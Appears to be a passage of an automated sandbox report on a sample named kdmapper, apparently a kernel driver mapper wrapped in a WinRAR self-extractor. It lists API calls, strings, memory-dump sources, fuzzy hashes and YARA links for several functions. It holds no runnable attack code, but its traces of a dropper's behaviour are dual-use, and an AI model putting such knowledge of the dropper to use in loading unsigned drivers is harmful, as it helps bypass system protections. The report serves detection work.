String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^c$__tmp_rar_sfx_access_check_%u$hc$winrarsfxmappingfile.tmp$Qe
API String ID: 3829768659-118249567
Opcode ID: 92803631abd0769ee5ee28cf84898c120b07d2083d3f122c64d92295ec127a01
Instruction ID: eb5c02d50e307f7b7d1669118fcb6e46724e51da807570a25a465a245a150a17
Opcode Fuzzy Hash: 92803631abd0769ee5ee28cf84898c120b07d2083d3f122c64d92295ec127a01
Instruction Fuzzy Hash: 1442F670944354BEEB219BB09C4AFBE37BFAB01B00F002159F645B62D2CFB55A44CBA5

Function 00630863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0063087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0063088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006308BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00630B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00630B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00630B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<e,00000000), ref: 00630BB1
CloseHandle.KERNEL32(00000000), ref: 00630C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00630C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<e,?,00000000,?,00000800), ref: 00630C72
GetFileAttributesW.KERNELBASE(?,?,|<e,00000800,?,00000000,?,00000800), ref: 00630C9C
GetFileAttributesW.KERNEL32(?,?,D=e,00000800), ref: 00630CD8

Part of subcall function 0063081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
Part of subcall function 0063081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858

_swprintf.LIBCMT ref: 00630D4A
_swprintf.LIBCMT ref: 00630D96

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

AllocConsole.KERNEL32 ref: 00630D9E
GetCurrentProcessId.KERNEL32 ref: 00630DA8
AttachConsole.KERNEL32(00000000), ref: 00630DAF
_wcslen.LIBCMT ref: 00630DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00630DD5
WriteConsoleW.KERNEL32(00000000), ref: 00630DDC
Sleep.KERNEL32(00002710), ref: 00630DE7
FreeConsole.KERNEL32 ref: 00630DED
ExitProcess.KERNEL32 ref: 00630DF5

Strings

h>e, xrefs: 0063099F
4Be, xrefs: 00630B3D
|?e, xrefs: 00630A09
P>e, xrefs: 00630997
(=e, xrefs: 0063092F
kernel32, xrefs: 00630873
@e, xrefs: 00630AAE
SetDefaultDllDirectories, xrefs: 006308B9
HAe, xrefs: 00630ADA
|<e, xrefs: 00630B9E, 00630BA2
,@e, xrefs: 00630A56
h=e, xrefs: 00630947
dwmapi.dll, xrefs: 00630927, 00630D0D
0Ae, xrefs: 00630ACF
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00630D84
SetDllDirectoryW, xrefs: 00630888
H@e, xrefs: 00630A61
dAe, xrefs: 00630AE5
H?e, xrefs: 006309F3
|@e, xrefs: 00630A77
uxtheme.dll, xrefs: 00630D17
>e, xrefs: 006309C7
T=e, xrefs: 0063093F
8>e, xrefs: 0063098F
<e, xrefs: 00630917
?e, xrefs: 00630A35
DXGIDebug.dll, xrefs: 006308FC, 00630C5E
d?e, xrefs: 006309FE
D=e, xrefs: 00630CB9, 00630CC9
`@e, xrefs: 00630A6C
0?e, xrefs: 006309E8
,<e, xrefs: 006308E7
Ae, xrefs: 00630B1C

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=e$,<e$,@e$0?e$0Ae$4Be$8>e$D=e$DXGIDebug.dll$H?e$H@e$HAe$P>e$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=e$`@e$d?e$dAe$dwmapi.dll$h=e$h>e$kernel32$uxtheme.dll$|<e$|?e$|@e$<e$>e$?e$@e$Ae
API String ID: 1207345701-3325451791
Opcode ID: 2d07f1df29da917e5e964dcd3a47aba558dcfa066bcf44e1c030210b3cf229e0
Instruction ID: 27c5cc3e62403e93d5c90c03885bb0c6ef022ceb85bcd6e0525c7e08f62b43bf
Opcode Fuzzy Hash: 2d07f1df29da917e5e964dcd3a47aba558dcfa066bcf44e1c030210b3cf229e0
Instruction Fuzzy Hash: 3ED193B1008364ABD331DF50D859ADFBEFAAF84B4AF50591DF98596380CB70864CCB92

Function 0063C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0063C744

Part of subcall function 0063B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0063B3FB

Part of subcall function 0063AF98: _wcschr.LIBVCRUNTIME ref: 0063B033

_wcslen.LIBCMT ref: 0063CA0A
_wcslen.LIBCMT ref: 0063CA13
SetWindowTextW.USER32(?,?), ref: 0063CA71
_wcslen.LIBCMT ref: 0063CAB3
_wcsrchr.LIBVCRUNTIME ref: 0063CBFB
GetDlgItem.USER32(?,00000066), ref: 0063CC36
SetWindowTextW.USER32(00000000,?), ref: 0063CC46
SendMessageW.USER32(00000000,00000143,00000000,0066A472), ref: 0063CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0063CC7F

Strings

%s.%d.tmp, xrefs: 0063C940
<br>, xrefs: 0063C9D4
ProgramFilesDir, xrefs: 0063CB45
c, xrefs: 0063CB24
Software\Microsoft\Windows\CurrentVersion, xrefs: 0063CB1A
<c, xrefs: 0063C909

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$<c$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$c
API String ID: 986293930-2607664511
Opcode ID: c25f3e5c28fcf77cbfd193b946d328bf717355187fe3496ffd3dd1f74a0a2e72
Instruction ID: 437e1ee01c6e7d1fd9c407295ba5c7f15c8f7a68f52c27a10ac876d244b8ac02
Opcode Fuzzy Hash: c25f3e5c28fcf77cbfd193b946d328bf717355187fe3496ffd3dd1f74a0a2e72
Instruction Fuzzy Hash: 9DE168B2900228AADF25DBA4DD45EEE77BE9F05350F0041AAF549E7140EF749F848FA4

Function 0062DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0062DA70
_wcschr.LIBVCRUNTIME ref: 0062DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0062DAAC

Part of subcall function 0062C29A: _wcslen.LIBCMT ref: 0062C2A2

Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0

Part of subcall function 00631B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0062BAE9,00000000,?,?,?,000303EC), ref: 00631BA0

_wcslen.LIBCMT ref: 0062DDE9
__fprintf_l.LIBCMT ref: 0062DF1C

Strings

*messages***, xrefs: 0062DBC1
9e, xrefs: 0062DDD0
,, xrefs: 0062DF57
*messages***, xrefs: 0062DBFA
, xrefs: 0062DD6C
$%s:, xrefs: 0062DEFF
R, xrefs: 0062DC0C
RTL, xrefs: 0062DEDE
a, xrefs: 0062DC16
@%s:, xrefs: 0062DF06, 0062DF12

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9e
API String ID: 557298264-2168584641
Opcode ID: b9c86af2798459fd3a06bab737f6475d497504142bea608449a41b5542b91d31
Instruction ID: 4b15106f825ad50622e97eb6e0882b05bc5aa0c3c09ace2300efc39ffdd23b74
Opcode Fuzzy Hash: b9c86af2798459fd3a06bab737f6475d497504142bea608449a41b5542b91d31
Instruction Fuzzy Hash: 3E32F171900628DBDF24EF64E845AEE77A6FF05700F40056AF9069B281E7B2DD85CF94

Function 0063D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0063B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
Part of subcall function 0063B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
Part of subcall function 0063B568: IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
Part of subcall function 0063B568: TranslateMessage.USER32(?), ref: 0063B5AC
Part of subcall function 0063B568: DispatchMessageW.USER32(?), ref: 0063B5B6

GetDlgItem.USER32(00000068,0067FCB8), ref: 0063D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0063AF07,00000001,?,?,0063B7B9,0065506C,0067FCB8,0067FCB8,00001000,00000000,00000000), ref: 0063D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0063D51B
SendMessageW.USER32(00000000,000000C2,00000000,006535F4), ref: 0063D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0063D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0063D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0063D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0063D5E1
SendMessageW.USER32(00000000,000000C2,00000000,006543F4), ref: 0063D5F0

Strings

\, xrefs: 0063D549

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 8dffcd206025575c6383409630f0e00a34ab0ff73ba75fa35c1e1f6de76a9648
Instruction ID: a4d036ef46bac5f2f52ff4eb26ad8c29cbfb61f60115c0fe1de0524aa52a3eb0
Opcode Fuzzy Hash: 8dffcd206025575c6383409630f0e00a34ab0ff73ba75fa35c1e1f6de76a9648
Instruction Fuzzy Hash: 0331E771145351BFD301DF20DC4AFAB7FAEEB82B14F000608F651962D0DBA48A0487BB

Function 0063D78F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0063D7AE
ShellExecuteExW.SHELL32(?), ref: 0063D8DE
ShowWindow.USER32(?,00000000), ref: 0063D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0063D959
CloseHandle.KERNEL32(?), ref: 0063D97F
ShowWindow.USER32(?,00000001), ref: 0063D9E1

Strings

.exe, xrefs: 0063D989
rc, xrefs: 0063D911
hc, xrefs: 0063D92E
.inf, xrefs: 0063D89A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf$hc$rc
API String ID: 36480843-1233218367
Opcode ID: 224246c35631be2cf74013b2be519c2c8e6aaf9929064327cf68dceaaeb8f437
Instruction ID: ca811c26afbeb40f8b27ea4054dc00c921d99322f03b0cc528a93b56c78021cc
Opcode Fuzzy Hash: 224246c35631be2cf74013b2be519c2c8e6aaf9929064327cf68dceaaeb8f437
Instruction Fuzzy Hash: 4851A170504380AADB319F24B844BEB7BE7AF42B44F04141EF9C5973A1E7B19A85CB92

Function 0064A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00645695,00645695,?,?,?,0064ABAC,00000001,00000001,2DE85006), ref: 0064A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0064ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0064AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0064AB35
__freea.LIBCMT ref: 0064AB42

Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38

__freea.LIBCMT ref: 0064AB4B
__freea.LIBCMT ref: 0064AB70

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 5f2ea50e6fe21347169f625d5c9bb40ea6a31de2b96d72da6147046dce6a54f8
Instruction ID: c29c2074e649b149a65dc9ee753907a7d751d51b3b9b2de003e3b4d47274c963
Opcode Fuzzy Hash: 5f2ea50e6fe21347169f625d5c9bb40ea6a31de2b96d72da6147046dce6a54f8
Instruction Fuzzy Hash: EA519F72A50216BFDB258FA4CC41EEBB7ABEB45750F15462DFC04D6240EB34DC90C696

Function 00643B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00643C35,?,?,00682088,00000000,?,00643D60,00000004,InitializeCriticalSectionEx,00656394,InitializeCriticalSectionEx,00000000), ref: 00643C03

Strings

api-ms-, xrefs: 00643BC3

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 3c1ae6dbef071799aa28d708223bace20725d7b8db73d12919678d9fbe0b0803
Instruction ID: 05efc73f9973a5f86586d9c2d159970956ce1f4d74ec66f82ce2738342057608
Opcode Fuzzy Hash: 3c1ae6dbef071799aa28d708223bace20725d7b8db73d12919678d9fbe0b0803
Instruction Fuzzy Hash: 6C11A335A45731ABDB228B68DC41B9A77A6DF11BB1F250250F915EB390E770EF008AD1

Function 006298E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00627760,?,00000005,?,00000011), ref: 0062995F
GetLastError.KERNEL32(?,?,00627760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0062996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00627760,?,00000005,?), ref: 006299A2
GetLastError.KERNEL32(?,?,00627760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006299AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00627760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006299F9

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: de54ab9eada6c4101ec8b49140a4f3848b4673fc4a586431c2c73610a64194a3
Instruction ID: d2de55ccd6ea1e987d4a307e592ba076aad02157562bd464cd06b65ad2771cc9
Opcode Fuzzy Hash: de54ab9eada6c4101ec8b49140a4f3848b4673fc4a586431c2c73610a64194a3
Instruction Fuzzy Hash: 4D312530944B616FE7209F20DC46BDABB96BB84330F140B1DF9A1922C0D3B49994CFA4

Function 0063ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0063ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0063ABF9

Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0063ABE9

Strings

EDIT, xrefs: 0063ABCD, 0063ABD8, 0063ABE5

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: c61ff7aee2a56ba01451b111268b6922f6cf551659ba108ef693584e95c0c041
Instruction ID: c1799fbf30e48dedbbeb4c940a94053d31f4866d9abc56a4887325a63dd7bd0c
Opcode Fuzzy Hash: c61ff7aee2a56ba01451b111268b6922f6cf551659ba108ef693584e95c0c041
Instruction Fuzzy Hash: 85F0E23260022876DB205A649C09FDBB6AE9B46F40F484119BE41A2280DB60DA4196F6

Function 0063AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0063081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
Part of subcall function 0063081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858

OleInitialize.OLE32(00000000), ref: 0063AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0063AC66
SHGetMalloc.SHELL32(00668438), ref: 0063AC70

Strings

riched20.dll, xrefs: 0063AC1E

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 7c145e7abea2c358c0e51cb54311a1ed347d0dafbcc8595a2afe5c28aa9e27f5
Instruction ID: 2c5d990e2c23a4592f0aa6c31ef19a827ad9652002aeae8bf34e1ef20c4fb7de
Opcode Fuzzy Hash: 7c145e7abea2c358c0e51cb54311a1ed347d0dafbcc8595a2afe5c28aa9e27f5
Instruction Fuzzy Hash: D3F06DB1D00219ABCB10AFA9D8499EFFFFDEF84B00F00415AE811E2241CBB456058FA0

Function 0063DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0063DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0063DC30

Strings

sfxcmd, xrefs: 0063DBEF
sfxpar, xrefs: 0063DC2B

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 01188c5dd7b706dac615433ee1877d47715b0a7344506958d6f6ffb4ab89f3af
Instruction ID: ac187c76d75108b507ba50cba57c2cc9fc18cfcfadae40971098b038cc9a0626
Opcode Fuzzy Hash: 01188c5dd7b706dac615433ee1877d47715b0a7344506958d6f6ffb4ab89f3af
Instruction Fuzzy Hash: FDF0E5B2414734ABDB302FA59C0ABFA3B9FAF04B82F041415FD8696291E6B08944D6F4

Function 00629785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00629795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 006297AD
GetLastError.KERNEL32 ref: 006297DF
GetLastError.KERNEL32 ref: 006297FE

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 475da24bc2550d01af6f03748e43b0b22d47f924bb2db0468e44fe4eaa23d7b4
Instruction ID: 995afa7de39fcb042357803ba12cedcc1e838450f628344a3171421face46c73
Opcode Fuzzy Hash: 475da24bc2550d01af6f03748e43b0b22d47f924bb2db0468e44fe4eaa23d7b4
